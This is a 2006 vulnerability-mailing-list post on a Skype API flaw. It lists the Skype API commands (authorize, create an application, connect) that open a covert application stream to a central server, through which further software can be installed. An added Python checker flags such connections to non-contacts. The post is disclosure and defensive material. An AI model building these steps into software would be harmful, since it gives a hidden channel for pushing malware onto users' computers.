Vulnerability Development mailing list archives

Skype API Ap2Ap Stream Creation Flaw


From: vizig0thblitz () gmail com
Date: 18 Aug 2006 23:06:58 -0000

An application-to-application stream can be created between two Skype clients without having established normal 
communications between them and while both Skype clients' contact lists are empty.  With this ability any Skype-enabled 
application can create a covert communication stream to a central server.  This can only occur, of course, if the user 
voluntarily installs the application.  Therefore, the main attack vector for this functionality is to create a 
legitimate Skype-enabled application, have the user install the application, and once the user starts the application 
make a covert connection to a central server.  Once the connection to the central server is made, additional software 
can be downloaded and installed on the target computer via the application-to-application stream.

Scenario Setup:

The following will be needed to recreate the scenario:

1. Two computers with Skype installed and two separate Skype Ids that have had no communication between them.

2. A copy of SkypeTracer installed on each computer.

Scenario Steps:

1. Start the Skype clients and SkypeTracer on each computer and attach the SkypeTracer application to their respective 
Skype clients.

2. Choose one of the Skype clients to be the central server and one to be the client that will establish the covert 
communication.

3. In the client SkypeTracer application send the following Skype command (the API spells the property as one word):

       SET USER [server Skype Id] ISAUTHORIZED TRUE

4. You will notice the chatter back and forth between the two clients adding each of the Skype Ids to their respective 
user1024.dbb files.  This is the only place that I have found where the central server Skype Id can be found on the 
client's computer.

5. In both SkypeTracer applications create a common application using the Skype command:

       CREATE APPLICATION test

6. Once the processes in steps three and four have been completed (it can take up to ten seconds) send the following Skype 
command on the client SkypeTracer application:

       GET APPLICATION test CONNECTABLE

7. The client SkypeTracer application should echo back the central server's Skype Id.

8. Once the connectable user has been verified you can then complete the steps to establish application-to-application 
communication using the Skype command

       ALTER APPLICATION test CONNECT [server Skype Id]

on the client SkypeTracer application.

9. Both SkypeTracer applications should now echo back that the application streams have been created.
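As an added example, not part of the original post, a small Python checker that runs over a constructed list of Skype API commands (in the form SkypeTracer shows them) and flags any app2app CONNECT whose peer is not in the user's contact list, noting whether the same command sequence authorized that peer first. The command lines, the contact list and the peer name `covert-server` are all constructed for the example.

```python
import re

# Constructed sample of Skype API commands as an attached application might
# issue them; these mirror the commands in the post above, not a real trace.
SAMPLE_COMMANDS = [
    "SET USER covert-server ISAUTHORIZED TRUE",
    "CREATE APPLICATION test",
    "GET APPLICATION test CONNECTABLE",
    "ALTER APPLICATION test CONNECT covert-server",
    "ALTER APPLICATION test CONNECT alice",
]

# Constructed contact list of the local user (Skype IDs are case-insensitive).
CONTACT_LIST = {"alice", "bob"}

# The API property is ISAUTHORIZED; accept the "IS AUTHORIZED" spelling from
# the post as well so pasted command logs still match.
AUTH_RE = re.compile(r"^SET USER (\S+) IS ?AUTHORIZED TRUE$", re.IGNORECASE)
CONNECT_RE = re.compile(r"^ALTER APPLICATION (\S+) CONNECT (\S+)$", re.IGNORECASE)


def find_covert_connects(commands, contacts):
    """Return (app, peer, self_authorized) for every app2app CONNECT whose
    peer is not a known contact. self_authorized is True when the same
    command sequence granted that peer authorization, which is exactly the
    pattern the post describes: authorize, then connect, with no prior
    contact relationship."""
    contacts = {c.lower() for c in contacts}
    authorized_here = set()
    findings = []
    for cmd in commands:
        cmd = cmd.strip()
        m = AUTH_RE.match(cmd)
        if m:
            authorized_here.add(m.group(1).lower())
            continue
        m = CONNECT_RE.match(cmd)
        if m:
            app, peer = m.group(1), m.group(2).lower()
            if peer not in contacts:
                findings.append((app, peer, peer in authorized_here))
    return findings


if __name__ == "__main__":
    for app, peer, self_auth in find_covert_connects(SAMPLE_COMMANDS, CONTACT_LIST):
        tag = "authorized in-session" if self_auth else "never authorized here"
        print(f"app2app CONNECT from '{app}' to non-contact '{peer}' ({tag})")
```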

